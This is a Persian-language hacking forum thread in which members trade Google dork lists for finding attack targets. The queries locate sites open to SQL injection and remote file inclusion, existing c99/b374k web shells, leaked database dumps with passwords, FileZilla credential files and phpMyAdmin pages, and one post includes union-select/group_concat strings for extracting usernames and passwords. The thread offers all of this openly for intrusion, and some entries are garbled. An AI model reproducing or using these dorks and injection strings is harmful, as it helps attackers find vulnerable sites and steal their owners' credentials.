inurl:doku.php?id=


موفق باشید .-.×.-.!

__Red.Hat__
05-07-2011, 01:57 AM
SQLi Google Dork [Priv8] __ New 2011


intext:"Powered by dhtml-menu-builder.com" inurl:.asp?id=


____________________________/

__Red.Hat__
05-07-2011, 08:42 PM
SQLi Google Dork [New] Live Targets



inurl:B_search+cid

inurl:pollBooth.php+pollID

امیدوارم ک بتونین تارگت های خوبی پیدا کنین...!
موفق باشین.

BlackSkymoon
05-12-2011, 02:27 PM
درک phpmyadmin برای bypass کردن admin


allinurl:index.php?db=information_schema





موفق باشید

OMID_3rver
06-14-2011, 06:49 PM
سلام. اینم مجموعه دورک های 2011

قابل شما رو هم نداره :26:cigar



inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
article.php?id=
play_old.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
article.php?id=
play_old.php?id=
declaration_more.php?decl_id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
Productinfo.php?id=
website.php?id=
Productinfo.php?id=
showimg.php?id=
view.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
iniziativa.php?in=
detail_new.php?id=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
hotel.php?id=
art.php?idm=
title.php?id=
look.php?ID=
story.php?id=
labels.php?id=
review.php?id=
chappies.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
ages.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: filesize()
"id=" & intext:"Warning: require()

OMID_3rver
06-14-2011, 06:52 PM
اینا یکم قدیمی تر هست


site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & "id"
site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & "id"

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=
catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=

bookpage.php?id=

iman.tak
07-17-2011, 03:05 PM
rfi


inurl:/index.php?site=

inurl:/index.php?inc=

inurl:/index.php?page=

inurl:/index.php?cat=

inurl:/index.php?file=

nurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

virus noir
07-24-2011, 08:25 AM
شكراااااااااا

__Red.Hat__
07-30-2011, 07:14 PM
virus noir عزيز...! خواهش ميكنم ديگه اينجا چنين پستهايي كه اسپم محسوب ميشه نديد و اگه گوگل درك هاي جديدي دارين قرار بدين تا دوستان علاقه مند استفاده بكنند...!



پيدا كردن شل هاي b374k :

Google search: intitle:m1n1 1.01 ([Only registered and activated users can see links])

پيدا كردن شل ها c99 :

Google search: "[Only registered and activated users can see links]*.com - c99shell" OR "[Only registered and activated users can see links]*.net - c99shell" OR "[Only registered and activated users can see links]*.org - c99shell" ([Only registered and activated users can see links]*.com+-+c99shell%22+OR+%22[Only registered and activated users can see links]*.net+-+c99shell%22+OR+%22[Only registered and activated users can see links]*.org+-+c99shell%22)

پيدا كردن شل Locus7 :

Google search: intitle:Locus7shell intext:"Software:" ([Only registered and activated users can see links] %22)

اطلاعات PostgreSQL با كلمات عبور آن :

Google search: filetype:sql "PostgreSQL database dump" (pass|password|passwd|pwd) ([Only registered and activated users can see links] 0dump%22%20(pass|password|passwd|pwd))

اطلاعات شاداب درباره نصب و راه اندازي آپاچي سرور روي سايت ها و سرورها :

Google search: inurl:server-info intitle:"Server Information" Apache Server Information ([Only registered and activated users can see links] %20Server%20Information)

مخلص هم آشيانه اي هاي عزيز...!

breake
08-01-2011, 02:51 PM
thnks a lot .. very nice dorks

breake
08-01-2011, 02:53 PM
site:.be inurl:"cid=" & intext:"Warning: mysql_fetch_array()"

site:.tw inurl:"newsid=" & intext:"Warning: mysql_fetch_array()"

site:.tw inurl:"cid=" & intext:"Warning: mysql_fetch_array()"

veyskarami
08-11-2011, 05:05 PM
DNN
تمام سایت ها

inurl:/tabid/*/language/*/Default.aspx

veyskarami
08-11-2011, 05:34 PM
همینطور میتونید مستقیم برید سر اصل مطلب

inurl:"Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

mortezasaeedy
08-17-2011, 09:08 PM
درك DNN:



Providers/HtmlEditorProviders/Fck/fcklinkgallery


با تشكر از همه ي برو بچه هاي عزيزان آشيانه !

ببخشيد مثل بالاييه :( من فقط صفحه اولو ديدم ! خيلي خيلي ببخشيد !

ndjoker
08-18-2011, 07:55 PM
سلام به همه

اینم چندتا دورک از ما

inurl:group_concat(username,0x3a,password
inurl:union+select and informatio_schema.tables

خوب با اولی می تونین خیلی ساده یوزر و پسورد رو گیر بیارین

موفق و موید !

reza40
08-22-2011, 07:30 PM
منم یه چنتایی دارم اما نمیدونم تکراری هستن یا نه شرمندمcigar
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
!scan side.php?arq= allinurl:.php?arq=
!scan side.php?table= allinurl:.php?table=
!scan side.php?vis= allinurl:.php?vis=
!scan side.php?vis= allinurl:side.php?vis=
اگه استفاده کردین تشکر یادتون نره

City King
11-02-2011, 08:09 PM
یه دورک نمیشناسین که سایتایی که میاین (برای sql) راحت تر از بقیه هک بشن؟

EviL ShaDoW
11-02-2011, 08:10 PM
..........

iranmarket
11-10-2011, 02:20 PM
ممنون از همتون

jok haker
12-18-2011, 11:20 PM
با سلام به برو بچه های گل...

من هرچی تو چنته داشتم رو میکنم دیگه خستم کردید....

حالا هی بگید من بد...

City King
12-23-2011, 03:29 PM
یه دورک نمیشناسین که سایتایی که میاین (برای sql) راحت تر از بقیه هک بشن؟

نیست؟

(میبخشید از بابت اسپم آخه اعصابم خورد شده هرچی میزنم یا پسوردش کرک نمیشه یا ادمین پیجش نیست یا تا وسطا میره دیگه نمیره یا...:frown:)

adonis27
12-23-2011, 04:52 PM
inurl:"/includes/config.php"
intitle:index.of? configuration.php.zip
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
inurl:php intitle:"Cpanel , FTP CraCkeR"
inurl:/xampp
intitle:#k4raeL - sh3LL
+intext:"AWSTATS DATA FILE" filetype:txt
inurl:"/Application Data/Filezilla/*" OR inurl:"/AppData/Filezilla/*" filetype:xml
inurl:"trace.axd" ext:axd "Application Trace"
filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)
site:il inurl:index.php?m_id=اینم چنتا دورک از منsql

adonis27
12-23-2011, 04:54 PM
اگه تکراریه به بزرگیه خودتون ببخشید

inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
تشکر یادتون نره

sssssm
12-28-2011, 07:58 PM
Priv8


inurl:explorer.cfm inurl:(dirpath|This_Directory)

filetype:cfg ks intext:rootpw -sample -test -howto

"Index Of /network" "last modified"

intitle:intranet inurl:intranet +intext:"human resources"

inurl:/tmp

"index of" inurl:recycler

inurl:/pls/sample/admin_/help/

inurl:ojspdemos

inurl:j2ee/examples/jsp

"index of cgi-bin"

intitle:"Index of" cfide

intitle:"index.of.personal"

intitle:"Index of c:\Windows"

"Welcome to phpMyAdmin" " Create new database"

inurl:backup intitle:index.of inurl:admin

protected

secure

winnt

sssssm
12-30-2011, 11:15 PM
Proxyyy List Search (Priv8)


+":8080" +":3128" +":80" filetype:txt

sssssm
12-30-2011, 11:42 PM
ASP Dorks for SQL Injection { Priv8 }


".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID="
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
